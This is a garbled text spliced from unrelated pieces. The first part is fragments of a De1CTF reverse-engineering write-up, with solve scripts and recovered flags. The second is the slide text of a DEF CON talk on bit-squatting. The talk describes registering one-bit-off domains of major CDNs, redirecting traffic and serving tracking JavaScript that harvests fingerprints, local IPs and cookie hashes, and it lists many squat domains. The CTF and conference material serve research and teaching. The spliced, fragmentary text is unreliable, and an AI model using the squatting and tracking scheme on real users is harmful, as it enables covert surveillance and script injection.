232, 225, 15], [224, 192, 5, 102, 220, 42, 18, 221, 124, 173, 85, 87, 112,
175, 157, 72, 160, 207, 229, 35, 136, 157, 229, 10, 96, 186, 112, 156, 69,
195, 89, 86, 238, 167, 169, 154, 137, 47, 205, 238, 22, 49, 177, 83], [234,
233, 189, 191, 209, 106, 254, 220, 45, 12, 242, 132, 93, 12, 226, 51, 209,
114, 131, 4, 51, 119, 117, 247, 19, 219, 231, 136, 251, 143, 203, 145, 203,
212, 71, 210, 12, 255, 43, 189, 148, 233, 199, 224], [5, 62, 126, 209, 242,
136, 95, 189, 79, 203, 244, 196, 2, 251, 150, 35, 182, 115, 205, 78, 215,
183, 88, 246, 208, 211, 161, 35, 39, 198, 171, 152, 231, 57, 44, 91, 81,
58, 163, 230, 179, 149, 114, 105], [72, 169, 107, 116, 56, 205, 187, 117,
2, 157, 39, 28, 149, 94, 127, 255, 60, 45, 59, 254, 30, 144, 182, 156, 159,
26, 39, 44, 129, 34, 111, 174, 176, 230, 253, 24, 139, 178, 200, 87, 44,
71, 67, 67], [5, 98, 151, 83, 43, 8, 109, 58, 204, 250, 125, 152, 246, 203,
135, 195, 8, 164, 195, 69, 148, 14, 71, 94, 81, 37, 187, 64, 48, 50, 230,
165, 20, 167, 254, 153, 249, 73, 201, 40, 106, 3, 93, 178], [104, 212, 183,
194, 181, 196, 225, 130, 208, 159, 255, 32, 91, 59, 170, 44, 71, 34, 99,
157, 194, 182, 86, 167, 148, 206, 237, 196, 250, 113, 22, 244, 100, 185,
47, 250, 33, 253, 204, 44, 191, 50, 146, 181], [143, 5, 236, 210, 136, 80,
252, 104, 156, 100, 209, 109, 103, 134, 125, 138, 115, 215, 108, 155, 191,
160, 228, 183, 21, 157, 225, 61, 89, 198, 250, 57, 189, 89, 205, 152, 184,
86, 207, 72, 65, 20, 209, 155], [103, 51, 118, 167, 111, 152, 184, 97, 213,
190, 175, 93, 237, 141, 92, 30, 82, 136, 16, 212, 99, 21, 105, 166, 161,
214, 103, 21, 116, 161, 148, 132, 95, 54, 60, 161, 207, 183, 250, 45, 156,
81, 208, 15], [150, 65, 4, 37, 202, 4, 54, 106, 113, 55, 51, 181, 225, 120,
173, 61, 251, 42, 153, 149, 88, 160, 79, 197, 204, 20, 65, 79, 165, 85,
203, 193, 203, 97, 9, 142, 53, 50, 127, 193, 225, 11, 121, 148], [99, 27,
20, 52, 248, 197, 117, 210, 216, 249, 122, 48, 225, 117, 211, 2, 33, 172,
60, 140, 84, 44, 71, 187, 160, 198, 26, 100, 162, 92, 89, 181, 82, 55, 184,
152, 112, 51, 248, 255, 205, 145, 31, 137], [209, 78, 219, 94, 189, 146,
92, 172, 214, 106, 122, 121, 90, 60, 174, 6, 82, 28, 166, 206, 248, 86, 28,
113, 159, 183, 196, 12, 183, 146, 225, 107, 169, 128, 67, 221, 228, 244,
212, 66, 118, 136, 162, 218], [163, 143, 112, 123, 98, 87, 0, 143, 198,
176, 196, 246, 231, 201, 157, 169, 244, 123, 106, 210, 50, 159, 47, 55, 28,
203, 235, 91, 74, 16, 175, 125, 53, 54, 82, 2, 112, 159, 122, 251, 118,
138, 120, 184], [187, 81, 128, 55, 221, 223, 44, 37, 166, 168, 32, 169, 22,
255, 169, 251, 101, 158, 161, 153, 89, 1, 244, 87, 246, 237, 157, 232, 180,
3, 248, 23, 58, 162, 144, 159, 173, 28, 117, 196, 186, 225, 81, 83], [169,
45, 229, 173, 17, 248, 83, 201, 242, 38, 116, 201, 12, 87, 3, 231, 200,
143, 166, 63, 146, 86, 240, 197, 26, 198, 21, 34, 202, 192, 26, 188, 203,
3, 13, 238, 109, 179, 214, 146, 193, 255, 226, 189], [16, 63, 38, 178, 184,
25, 51, 81, 142, 189, 2, 37, 163, 244, 157, 193, 149, 21, 6, 215, 185, 13,
205, 56, 158, 45, 48, 243, 98, 248, 129, 223, 68, 111, 88, 62, 119, 28,
255, 243, 132, 238, 149, 75], [185, 141, 49, 173, 86, 9, 150, 99, 183, 114,
226, 133, 170, 2, 65, 124, 2, 164, 2, 155, 153, 89, 109, 220, 138, 127,
150, 213, 114, 6, 151, 227, 248, 172, 28, 0, 92, 63, 41, 229, 214, 120, 49,
164], [242, 48, 147, 252, 204, 89, 111, 168, 251, 136, 160, 106, 5, 155,
137, 198, 250, 250, 57, 180, 252, 118, 165, 21, 254, 155, 154, 247, 242,
217, 131, 65, 35, 207, 112, 77, 209, 176, 122, 192, 147, 107, 80, 37], [52,
183, 251, 29, 226, 175, 39, 75, 34, 254, 233, 96, 155, 144, 9, 254, 189,
41, 169, 184, 91, 97, 87, 88, 251, 138, 114, 118, 91, 156, 198, 75, 222,
19, 183, 52, 81, 194, 144, 13, 249, 111, 3, 73], [21, 107, 222, 106, 222,
98, 190, 4, 244, 225, 112, 133, 120, 253, 141, 48, 52, 154, 63, 235, 190,
78, 33, 209, 4, 172, 158, 187, 219, 151, 17, 233, 214, 32, 120, 38, 26, 0,
250, 129, 251, 40, 89, 39], [25, 66, 117, 107, 200, 80, 88, 90, 24, 176,
247, 95, 59, 121, 118, 67, 56, 133, 145, 167, 24, 46, 180, 145, 128, 220,
200, 29, 172, 157, 100, 9, 97, 253, 8, 200, 52, 229, 147, 218, 254, 255,
182, 170], [172, 79, 214, 26, 85, 230, 228, 223, 32, 227, 84, 74, 109, 209,
222, 45, 48, 66, 23, 197, 52, 212, 179, 184, 90, 149, 199, 128, 153, 70, 3,
73, 160, 39, 49, 165, 88, 252, 135, 9, 157, 140, 32, 33], [72, 233, 196,
173, 35, 166, 146, 186, 61, 86, 64, 42, 25, 86, 66, 93, 12, 255, 63, 83,
95, 219, 108, 152, 205, 31, 238, 77, 74, 156, 149, 228, 68, 244, 178, 78,
181, 173, 251, 248, 185, 99, 181, 205], [106, 86, 224, 51, 91, 194, 158,
83, 144, 77, 217, 95, 125, 119, 144, 47, 85, 220, 24, 40, 59, 77, 70, 190,
188, 20, 105, 150, 79, 85, 194, 168, 64, 215, 234, 226, 4, 99, 157, 0, 186,
74, 18, 94], [36, 23, 51, 78, 191, 254, 1, 166, 174, 62, 222, 243, 131,
207, 37, 4, 199, 35, 169, 7, 216, 42, 190, 241, 120, 11, 166, 129, 117, 93,
184, 50, 237, 84, 122, 67, 250, 248, 60, 96, 117, 91, 187, 79], [248, 17,
173, 127, 98, 184, 11, 20, 50, 140, 249, 248, 24, 222, 34, 86, 71, 0, 237,
138, 148, 107, 115, 104, 62, 191, 39, 221, 123, 115, 131, 229, 127, 56, 64,
177, 106, 239, 26, 255, 100, 88, 1, 75], [144, 18, 85, 103, 3, 31, 157, 44,
67, 24, 228, 226, 82, 208, 69, 17, 189, 216, 205, 140, 6, 1, 33, 11, 61,
223, 12, 116, 123, 167, 151, 58, 167, 79, 96, 189, 151, 233, 92, 94, 22,
60, 254, 254], [216, 167, 82, 244, 143, 231, 192, 63, 79, 49, 131, 176,
212, 46, 141, 107, 125, 207, 201, 5, 103, 155, 107, 166, 210, 49, 182, 60,
34, 26, 220, 198, 225, 160, 57, 52, 138, 27, 247, 181, 0, 67, 1, 205], [19,
243, 215, 203, 156, 157, 71, 187, 142, 198, 244, 52, 100, 195, 129, 134,
38, 227, 155, 241, 122, 192, 145, 179, 195, 16, 180, 70, 86, 219, 250, 67,
127, 47, 178, 249, 19, 36, 183, 50, 154, 186, 239, 15], [163, 224, 95, 10,
171, 106, 49, 57, 28, 178, 119, 6, 40, 228, 92, 163, 93, 225, 23, 37, 24,
211, 72, 105, 209, 70, 0, 165, 70, 226, 43, 187, 167, 60, 143, 233, 207,
209, 12, 207, 64, 246, 222, 16], [245, 140, 237, 250, 89, 99, 215, 112, 85,
182, 51, 26, 62, 220, 116, 17, 196, 247, 172, 121, 22, 106, 91, 200, 115,
240, 31, 78, 47, 126, 50, 114, 109, 88, 83, 120, 17, 95, 198, 206, 71, 112,
172, 49], [254, 198, 189, 175, 121, 123, 248, 38, 163, 170, 91, 171, 125,
66, 94, 37, 181, 207, 13, 60, 210, 178, 252, 39, 175, 18, 106, 94, 171,
196, 182, 129, 101, 165, 103, 164, 234, 110, 146, 69, 36, 75, 58, 98],
[184, 162, 160, 24, 71, 214, 24, 14, 196, 222, 67, 178, 163, 150, 206, 104,
38, 176, 245, 98, 180, 213, 93, 134, 25, 198, 166, 10, 183, 99, 207, 127,
163, 10, 141, 105, 52, 68, 18, 121, 217, 209, 124, 127], [142, 153, 245,
130, 182, 55, 211, 250, 217, 10, 172, 119, 212, 171, 244, 99, 99, 41, 223,
221, 128, 66, 31, 129, 195, 145, 241, 50, 77, 139, 29, 232, 60, 167, 110,
139, 124, 135, 18, 197, 200, 85, 15, 159], [225, 159, 86, 55, 158, 137,
229, 250, 129, 194, 200, 31, 147, 30, 219, 233, 147, 28, 6, 219, 81, 172,
132, 162, 212, 115, 232, 60, 152, 105, 146, 77, 187, 9, 20, 191, 157, 96,
131, 190, 125, 175, 141, 4], [110, 75, 232, 58, 102, 13, 222, 137, 137, 14,
191, 155, 48, 100, 169, 184, 49, 249, 49, 39, 138, 124, 63, 73, 237, 150,
244, 126, 127, 206, 91, 252, 110, 45, 189, 116, 188, 42, 18, 68, 194, 244,
53, 2], [109, 116, 87, 241, 128, 121, 227, 188, 2, 6, 81, 194, 4, 225, 176,
48, 8, 59, 243, 50, 234, 228, 192, 176, 168, 187, 248, 244, 27, 188, 107,
204, 222, 202, 73, 141, 160, 139, 151, 206, 1, 227, 152, 81], [13, 149, 85,
158, 164, 119, 149, 36, 138, 84, 173, 132, 39, 230, 96, 229, 84, 218, 14,
153, 184, 98, 160, 129, 2, 161, 99, 41, 17, 114, 55, 67, 192, 102, 241,
168, 149, 191, 216, 18, 229, 153, 94, 171]]
k.<a> = GF(2)[]
#l.<x> = GF(2^8, modulus = a^8 + a^4 + a^3 + a + 1)
# 0x39 a^5+a^4+a^3+1
l.<x> = GF(2^8, modulus = a^8 + a^5+a^4+a^3+1)
res = []
cmpl = []
parser
C++
tokenize
token
3
Token1 2 3 9
token
S→A{+A}*
A→B{_A}*
B→
X_X_X_X……+X_X_X……+……
for i in range(44):
cmpl.append(l.fetch_int(cmps[i]))
for i in range(44):
res2 = []
for j in range(44):
res2.append(l.fetch_int(datas[j][i]))
res.append(res2)
res = Matrix(res)
resi = res.inverse()
de = ''
for i in range(44):
t = 0
for j in range(44):
t += cmpl[j] * resi[j][i]
de += (chr(t.integer_representation()))
print(de)
\\n 9
+ 5
_ 6
{ 2
} 3
De1CTF 1
4
X
De1CTFRC4RC4
DES-CBCIVDe1CTFPKCS1Padding
De1CTF\x02\x02
AES-CBC AES128
caiPadding
AES
Padding
AES
DES
padding
DES
DESRC4
0b827a9e002e076de2d84cacb123bc1eb08ebec1a454e0f550c65d37c58c7daf2d4827342d3
b13d9730f25c17689198b10101010101010101010101010101010
91983da9b13a31ef0472b502073b68ddbddb3cc17d0b0b0b0b0b0b0b0b0b0b0b607adea582e
83f505b76fcb2e564e53a
a7afa7e823499e23365819edd506cc86e44f43892015ff27d8e16695fc99f81ed96659fd0ee
98f1f2e07070707070707
cdc535899f23f0b22e07070707070707
new = 'cdc535899f23f0b22e'.decode('hex')
for i in xrange(len(new)):
rc4 = ARC4.new('De1CTF')
print rc4.decrypt(new[i:])
4nd
p4r53r
AES RC4
16bytesDES
RC4
91983da9b13a31ef0472b502073b68ddbddb3cc17d0b0b0b0b0b0b0b0b0b0b0b
new = '91983da9b13a31ef0472b502073b68ddbddb3cc17d'.decode('hex')
for i in xrange(len(new)):
rc4 = ARC4.new('De1CTF')
print rc4.decrypt(new[i:])
h3ll0
3a31ef0472b502073b68ddbddb3cc17d
8e9b23a9e5959829f6f3060606060606
w0rld
l3x3r
1 RC4 w0rld
2 RC4 l3x3r
3 DES 1+2
4 RC4 h3llo
5 AES 3+4
6 RC4 4nd
7 RC4 p4r53r
8 DES 6+7
9 AES 5+8
Flag
FLw
IDA 7.0… …
OD
IDA 6.8 nop vm
opcode
base vm base vm
- [base] r1 head
- [base+0x4] r2 tail
- [base+0x8] temp
- [base+0xC] arr queue
- [base+0x10] mem
- [base+0x14] opcode_addr
- [base+0x18] input_str
……
26
cin >> input_Str; arr[r2++] = strlen(s); //
2d //
00 xx
arr[r2++] = nxtop; //
0c xx mem[nxtop] = arr[r1++]; //
16 xx arr[r2++] = mem[nxtop]; //
17
arr[r2++] = mem[arr[r1++]]; //
18
mem[arr[r1++]] = arr[r1++]; //
+
/ \\
+ _
/ \\ / \\
h3llo _ 4nd p4r53r
/ \\
w0rld l3x3r
De1CTF{h3ll0+w0rld_l3x3r+4nd_p4r53r}
1c
temp = arr[r1++] + (temp << 8);
1d xx
arr[r2++] = temp % nxtop;
temp /= nxtop;
1e
arr[r2++] = baseArr[arr[r1++]];
22
arr[r2++] = temp; temp = 0;
1f +
20 -
21 *
23 ^
2c xx
if (arr[r1++]) i -= nxtop; // jmp
eb xx if (arr[r1++]) exit;
0x1C De1CTF{} base64
0x3A base58
enc = [
0x7a, 0x19, 0x4f, 0x6e, 0x0e, 0x56, 0xaf, 0x1f,
0x98, 0x58, 0x0e, 0x60, 0xbd, 0x42, 0x8a, 0xa2,
0x20, 0x97, 0xb0, 0x3d, 0x87, 0xa0, 0x22, 0x95,
0x79, 0xf9, 0x41, 0x54, 0x0c, 0x6d
]
base = [
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x51, 0x57,
0x45, 0x52, 0x54, 0x59,
0x55, 0x49, 0x4F, 0x50, 0x41, 0x53, 0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B,
0x4C, 0x5A, 0x58, 0x43,
0x56, 0x42, 0x4E, 0x4D, 0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69,
0x6F, 0x70, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x7A, 0x78, 0x63, 0x76, 0x62,
0x6E, 0x6D, 0x2B, 0x2F,
0x3D
]
mid = [0 for i in range(0x1E)]
for i in range(0xa):
mid[i*3] = enc[i*3] ^ enc[i*3+2]
mid[i*3+1] = (enc[i*3+1] + mid[i*3]) & 0xFF
mid[i*3+2] = (enc[i*3+2] - enc[i*3+1]) & 0xFF
inv = [0 for i in range(128)]
for i in range(len(base)):
inv[base[i]] = i;
for i in range(0x1E):
mid[i] = inv[mid[i]];
flag = ''
for i in range(0xa):
tmp = 0
for j in range(3):
tmp = tmp * 0x3A + mid[i*3+j]
flag += chr((tmp >> 8) & 0xFF)
flag += chr(tmp & 0xFF)
print(flag)
# De1CTF{Innocence_Eye&Daisy*} | pdf |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75 | pdf |
Investigating the Practicality
and Cost of Abusing
Memory Errors with DNS
Project Bitfl1p by Luke Young
$ whoami
Undergraduate Student - Sophomore
Founder of Hydrant Labs LLC
This presentation is based upon research conducted as a employee of
Hydrant Labs LLC and was not supported or authorized by any previous,
current, or future employers with the exception of Hydrant Labs LLC.
Email: [email protected]
LinkedIn: https://www.linkedin.com/in/innoying
Twitter: @innoying
Agenda
What is a bitflip and their history
What is bit-squatting and how it works
Project Bitfl1p’s use of bit-squatting
Code and partial data release
Q&A
What is a bitflip?
or
1
0
0
1
What causes a bitflip?
Heat
Electrical Problems
Radioactive Contamination
Cosmic Rays
History of bitflips
“Using Memory Errors to
Attack a Virtual
Machine” - Princeton
University in 2003
Rowhammer
“Flipping Bits in Memory Without Accessing Them: An
Experimental Study of DRAM Disturbance Errors” -
Carnegie Mellon University in 2014
“Exploiting the DRAM rowhammer bug to gain kernel
privileges” - Google’s Project Zero
What is bit-squatting?
Named by Artem Dinaburg
Purchasing of domain names that are one bit away
from the legitimate name.
c
n
n
.
c
o
m
01100011 01101110 01101110 00101110 01100011 01101111 01101101
c
o
n
.
c
o
m
01100011 01101111 01101110 00101110 01100011 01101111 01101101
Example of bit-squatting
Generating valid bit-squats
e
01100101
u
m
a
g
d
01100101
01101101
01100001
01100111
01100100
www.defcon.org
Generating valid bit-squats
www.defcon.org
n
01101110
.
00101110
o
01101111
/
00101111
$ bf-lookup www.defcon.org
vww.defcon.org
uww.defcon.org
sww.defcon.org
gww.defcon.org
7ww.defcon.org
wvw.defcon.org
wuw.defcon.org
wsw.defcon.org
wgw.defcon.org
w7w.defcon.org
wwv.defcon.org
wwu.defcon.org
wws.defcon.org
wwg.defcon.org
ww7.defcon.org
wwwndefcon.org
www.eefcon.org
www.fefcon.org
www.lefcon.org
www.tefcon.org
www.ddfcon.org
www.dgfcon.org
www.dafcon.org
www.dmfcon.org
www.dufcon.org
www.degcon.org
www.dedcon.org
www.debcon.org
www.dencon.org
www.devcon.org
www.defbon.org
www.defaon.org
www.defgon.org
www.defkon.org
www.defson.org
www.defcnn.org
www.defcmn.org
www.defckn.org
www.defcgn.org
www.defcoo.org
www.defcol.org
www.defcoj.org
www.defcof.org
Previous bit-squatting
Artem Dinaburg - DEF CON 19
Jaeson Schultz - DEF CON 21
Robert Stucke - DEF CON 21
Project Bitfl1p
Detect and analyze the frequency of bit flips for an
average internet user through the use of bit-squatting
Browser
DNS Resolver
DNS Root
DNS Question (A)
code.jquery.com
DNS Question (A)
code.jquery.com
Browser
DNS Resolver
DNS Root
DNS Question (A)
code.jquesy.com
DNS Question (A)
code.jquery.com
Browser
DNS Resolver
DNS Root
DNS Answer (NS)
ns1.bitfl1p.com
ns2.bitfl1p.com
DNS Answer (NS)
ns1.bitfl1p.com
ns2.bitfl1p.com
DNS Question (NS)
jquesy.com
DNS Question (A)
code.jquery.com
DNS Question (A)
code.jquesy.com
DNS Question (NS)
jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
DNS Answer (A)
code.jquery.com
168.235.68.44
DNS Answer (A)
code.jquesy.com
168.235.68.45
DNS Answer (A)
code.jquery.com
168.235.68.44
DNS Answer (A)
code.jquesy.com
168.235.68.45
DNS Question (A)
code.jquery.com
DNS Question (A)
code.jquesy.com
DNS Question (A)
code.jquesy.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
DNS Answer (A)
code.jquery.com
168.235.68.44
DNS Answer (A)
code.jquery.com
168.235.68.44
DNS Question (A)
code.jquery.com
DNS Question (A)
code.jquesy.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
HTTP GET
/jquery.js
Host: jquery.com
HTTP 301 Moved
{uuid}.https.bitlf1p.com/
jquery.js
HTTP 301 Moved
{uuid}.https.bitlf1p.com/
jquery.js
DNS Q (A) code.jquesy.com
HTTP GET
/jquery.js
Host: code.jquery.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (A) code.jquery.com
DNS A (A) code.jquery.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 301 $.https.bitfl1p.com
HTTP 301 $.https.bitfl1p.com
DNS Question (A)
$.https.bitfl1p.com
DNS Question (A)
$.https.bitfl1p.com
DNS Question (A)
$.https.bitfl1p.com
DNS Answer (A)
$.https.bitfl1p.com
168.235.68.44
DNS Answer (A)
$.https.bitfl1p.com
168.235.68.44
DNS Answer (A)
$.https.bitfl1p.com
168.235.68.44
DNS Q (A) code.jquesy.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (A) code.jquery.com
DNS A (A) code.jquery.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 301 $.https.bitfl1p.com
HTTP 301 $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
HTTP GET
/jquery.js
Host: $.https.bitfl1p.com
HTTP GET
/jquery.js
Host: $.https.bitfl1p.com
DNS Q (A) code.jquesy.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (A) code.jquery.com
DNS A (A) code.jquery.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 301 $.https.bitfl1p.com
HTTP 301 $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 200
/tracking.js
HTTP 200
/tracking.js
DNS Q (A) code.jquesy.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (A) code.jquery.com
DNS A (A) code.jquery.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
Browser
DNS Resolver
Project Bitfl1p
DNS A (NS) ns1.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 301 $.https.bitfl1p.com
HTTP 301 $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS Q (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
DNS A (A) $.https.bitfl1p.com
HTTP GET /jquery.js
HTTP GET /jquery.js
HTTP 200 /tracking.js
HTTP 200 /tracking.js
Malicious JS Execution
DNS Q (A) code.jquesy.com
DNS Q (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (A) code.jquery.com
DNS A (A) code.jquery.com
DNS A (A) code.jquesy.com
DNS A (A) code.jquery.com
DNS Q (NS) jquesy.com
> bf-dns
Golang
DNS server designed to answer bit squatted domain
queries
> bf-www
Lighttpd
HTTP configuration and PHP scripts
Tracking JavaScript
Installed plugins, user agent, timezone, langauge,
referer, document title, screen size/resolution, current
URL, doNotTrack value
Installed fonts via flash
Local IPs via WebRTC sdp
Cookie names and SHA256 hashed value
Selecting a host (Ramnode)
Multiple IPv4 addresses
IPv6 support
Smaller
High and cheap bandwidth
Hosted on 2GB RAM, 2 IPv4, a /64 IPv6 addresses, 80GB
SSD cached, 3TB bandwidth a month
Price/Month: $15.50 USD
Selecting domains
Captured traffic for a day
Purchased flips of top (interesting) domains
googleusercontent.com
Chosen because it serves images for Google
Long name, increases probability of a flip
googleusercontent.com
coogleusercontent.com
eoogleusercontent.com
ggogleusercontent.com
gkogleusercontent.com
gmogleusercontent.com
gnogleusercontent.com
goggleusercontent.com
gokgleusercontent.com
gomgleusercontent.com
gongleusercontent.com
goocleusercontent.com
gooeleusercontent.com
googdeusercontent.com
googheusercontent.com
googlausercontent.com
googldusercontent.com
google5sercontent.com
googleqsercontent.com
googletsercontent.com
googleu3ercontent.com
googleucercontent.com
googleuqercontent.com
googleurercontent.com
googleusdrcontent.com
googleuse2content.com
googleusepcontent.com
googleuseraontent.com
googleuserbontent.com
googleusercgntent.com
googleuserckntent.com
googleusercmntent.com
googleusercnntent.com
googleusercoftent.com
googleusercojtent.com
googleusercoltent.com
googleusercon4ent.com
googleusercondent.com
googleuserconpent.com
googleusercontdnt.com
googleuserconteft.com
googleusercontejt.com
googleusercontelt.com
googleuserconten4.com
googleusercontend.com
googleusercontenp.com
googleusercontenu.com
googleusercontenv.com
googleuserconteot.com
googleusercontgnt.com
googleusercontmnt.com
googleusercontunt.com
googleuserconuent.com
googleuserconvent.com
googleusergontent.com
googleuserkontent.com
googleusersontent.com
googleusescontent.com
googleusevcontent.com
googleusezcontent.com
googleusgrcontent.com
googleusmrcontent.com
googleusurcontent.com
googleuwercontent.com
googlewsercontent.com
googlgusercontent.com
googlmusercontent.com
googluusercontent.com
googmeusercontent.com
googneusercontent.com
goooleusercontent.com
goowleusercontent.com
woogleusercontent.com
Panic…
More panic…
mail-attachment.googleusercontent.com - Mail
Attachments
oauth.googleusercontent.com - OAuth authentication
themes.googleusercontent.com - Google fonts
webcache.googleusercontent.com - Google cached pages
translate.googleusercontent.com - Google translated
webpages
cloudfront.net
CDN for Amazon CloudFront
Commonly used to serve JS, CSS, and media
43 possible bit-squats, 4 already registered
Registered 39 of them
cloudfront.net
aloudfront.net
bloudfront.net
cdoudfront.net
clgudfront.net
clkudfront.net
clmudfront.net
clnudfront.net
clo5dfront.net
cloqdfront.net
choudfront.net
clotdfront.net
cloudbront.net
cloudf2ont.net
cloudfbont.net
cloudfpont.net
cloudfrgnt.net
cloudfrknt.net
cloudfrmnt.net
cloudfrnnt.net
cloudfroft.net
cloudfrojt.net
cloudfrolt.net
cloudfron4.net
cloudfrond.net
cloudfronp.net
cloudfronu.net
cloudfronv.net
cloudfroot.net
cloudfsont.net
cloudfvont.net
cloudfzont.net
cloudnront.net
cloudvront.net
clouefront.net
cloulfront.net
cmoudfront.net
cnoudfront.net
kloudfront.net
sloudfront.net
amazonaws.com
Serves pretty much all AWS services as subdomains
excluding CloudFront.
Includes Amazon S3, ELB, and EC2
38 possible bit-squats, 37 were registered
33 were already registered by Amazon!
amazonass.com
s3namazonaws.com
compute-1namazonaws.com
compute-2namazonaws.com
elbnamazonaws.com
doubleclick.net
Serves Google Ads
Mainly via JavaScript
45 possible bit-squats, 19 already registered
doubleclick.net
dgubleclick.net
dkubleclick.net
dnubleclick.net
dmubleclick.net
doqbleclick.net
dotbleclick.net
doublecliak.net
doubleblick.net
doubleclibk.net
doublecligk.net
doubleclicc.net
doubleclikk.net
doubleclisk.net
doubleclmck.net
doublecnick.net
doublecmick.net
doublmclick.net
doubleglick.net
doubluclick.net
doubmeclick.net
doubneclick.net
doucleclick.net
doufleclick.net
doujleclick.net
dowbleclick.net
dourleclick.net
apple.com
Most apple services are served via subdomains
21 possible bit-squats, 1 available: applg.com
icloud.com
iOS/OSX devices check-in regularly
Receives emails for icloud.com accounts
25 possible bit-squats, 17 registered already
icdoud.com, iclgud.com, iclkud.com, iclmud.com,
iclnud.com, icloqd.com, iclotd.com, icnoud.com
jquery.com
JavaScript compatibility script
Used by over 70% of the top 10,000 sites
26 possible bit-squats, 9 already registered
jquery.com
jauery.com
jqqery.com
jpuery.com
jqtery.com
jqueby.com
jquepy.com
jquerq.com
jquerx.com
jquesy.com
jquevy.com
jqugry.com
jquezy.com
jqumry.com
jsuery.com
juuery.com
disqus.com
Blog comment hosting service
Roughly 750,000 thousand blogs/web-sites use it
27 possible bit-squats, 3 already registered
disqus.com
dhsqus.com
di3qus.com
diqqus.com
dirqus.com
dis1us.com
disaus.com
disqqs.com
disq5s.com
disqts.com
disqu3.com
disquc.com
disquq.com
disqur.com
disquw.com
disqws.com
disuus.com
diwqus.com
disyus.com
dksqus.com
dmsqus.com
eisqus.com
dysqus.com
tisqus.com
lisqus.com
google-analytics.com
The most widely used website statistics service
63 possible bit-squats, 53 already registered
googlm-analytics.com, googlg-analytics.com, googne-
analytics.com, gooole-analytics.com, ggogle-
analytics.com, gmogle-analytics.com, gomgle-
analytics.com, gooele-analytics.com, googde-
analytics.com, google-alalytics.com
sfdcstatic.com
CDN for SalesForce
SalesForce is one of the largest cloud computing
companies in the world
42 possible bit-squats
sfdcstatic.com
3fdcstatic.com
cfdcstatic.com
qfdcstatic.com
rfdcstatic.com
sbdcstatic.com
sfdbstatic.com
sfdcrtatic.com
sfdcqtatic.com
sfdastatic.com
sfdcctatic.com
sfdc3tatic.com
sfdcsdatic.com
sfdcs4atic.com
sfdcsta4ic.com
sfdcstadic.com
sfdcstatia.com
sfdcspatic.com
sfdcstathc.com
sfdcstapic.com
sfdcstatib.com
sfdcstatis.com
sfdcstavic.com
sfdcstatyc.com
sfdcstauic.com
sfdcstatik.com
sfdcstatig.com
sfdcstatkc.com
sfdcstatmc.com
sfdcstctic.com
sfdcstqtic.com
sfdcsvatic.com
sfdcsuatic.com
sfdcwtatic.com
sfdkstatic.com
sfdgstatic.com
sfecstatic.com
sfdsstatic.com
sflcstatic.com
sftcstatic.com
sndcstatic.com
svdcstatic.com
wfdcstatic.com
aspnetcdn.com
Microsoft’s Ajax Content Delivery Network
Serves Microsoft sites, and many jQuery plugins
39 possible bit-squats, 1 already registered
aspnetcdn.com
a3pnetcdn.com
acpnetcdn.com
arpnetcdn.com
aqpnetcdn.com
as0netcdn.com
aspfetcdn.com
aspjetcdn.com
aspndtcdn.com
aspletcdn.com
aspne4cdn.com
aspnedcdn.com
aspnepcdn.com
aspnetadn.com
aspnetbdn.com
aspnetcdf.com
aspnetcdj.com
aspnetcdl.com
aspnetcdo.com
aspnetcen.com
aspnetcln.com
aspnetctn.com
aspnetgdn.com
aspnetkdn.com
aspnetsdn.com
aspneucdn.com
aspnevcdn.com
aspngtcdn.com
aspoetcdn.com
aspnmtcdn.com
asqnetcdn.com
asrnetcdn.com
astnetcdn.com
awpnetcdn.com
asxnetcdn.com
espnetcdn.com
cspnetcdn.com
qspnetcdn.com
ispnetcdn.com
